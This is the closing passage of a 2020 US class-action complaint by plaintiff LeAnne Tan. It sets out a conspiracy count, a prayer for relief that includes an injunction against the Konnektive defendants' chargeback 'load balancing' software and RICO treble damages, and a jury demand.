569.   Plaintiff and the Class were harmed by the wrongful conducted committed by the Conspirators as part of the conspiracy, as described throughout this Complaint in the Causes of Action underlying the Conspiracy claim. As a direct and proximate result of the Conspirators' wrongful conduct, Plaintiff and the other Class Members have suffered injury in fact and have lost money or property, time, and attention. In reasonable reliance on the Conspirators' misrepresentations, Plaintiff and other Class Members purchased the products at issue and paid more for those products than they otherwise would have. In turn,

Plaintiff and other Class Members ended up with Products that were overpriced, inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore Plaintiff and other Class Members have suffered injury in fact. Defendant's representations were material to the decision of Plaintiffs and the Class Members to purchase Defendant's products, and a reasonable person would have attached importance to the truth or falsity of the representations made by Defendant in determining whether to purchase Defendant's products.

570.   Each of the Defendants listed in this Cause of Action is thus jointly and severally liable for the conduct committed by the conspiracy.

**PRAYER FOR RELIEF**

Wherefore, Plaintiff demands judgment as follows:

A.     An order declaring that this action may be maintained as a class action pursuant to Rule 23 of the Federal Rules of Civil Procedure, certifying this case as a class action, appointing Plaintiff as representative of the Class, and designating their attorneys as Class Counsel;

B.     Declaratory judgment that Defendant's actions are unfair and unlawful;

C.     An award of injunctive relief as permitted by law or equity including an order prohibiting Defendants from engaging in the unlawful and tortious acts described above, as well as prohibiting Defendants from charging any further subscription payments to members of the Class without first informing them of the misrepresentations and omissions, correcting them, and gaining affirmative consent to continue those subscriptions, and an order prohibiting the Konnektive Defendants from providing "load balancing" or other chargeback mitigation features as part of their software;

D.     A finding that such injunction constitutes public injunctive relief, has resulted in the enforcement of an important right affecting the public interest and otherwise meets the requirements of California Code of Civil Procedure § 1021.5, and an award of attorney's fees and costs pursuant to § 1021.5;

E.      For judgment for Plaintiff and the Class on their claims in an amount to be proven at trial, for economic, monetary, consequential, compensatory or statutory damages caused by Defendant's practices, along with punitive damages;

F.      For restitution and/or other equitable relief, including without limitation disgorgement of all revenues, profits, and unjust enrichment that Defendant obtained from Plaintiff and the Class as a result of its unlawful, unfair, and deceptive business practices described herein;

G.      For damages of three times the damages Plaintiff and the Class Members have sustained, plus the cost of this suit, including reasonable attorneys' fees pursuant to 18 U.S.C. § 1964(c) and (d);

H.      An award of attorney's fees and costs;

I.      For pre-judgment and post-judgment interest as provided for by law or allowed in equity; and

J.      Such other and further relief as is necessary and appropriate.

## DEMAND FOR JURY TRIAL

Pursuant to Fed. R. Civ. Proc. 38(b), Plaintiff demands a trial by jury on all issues so triable.

DATED: June 12, 2020                                Respectfully submitted,

**KNEUPPER & COVEY PC**

/s/ Kevin M. Kneupper
Kevin M. Kneupper Esq.
*Attorney for Plaintiff LeAnne*
*Tan and the Putative Class*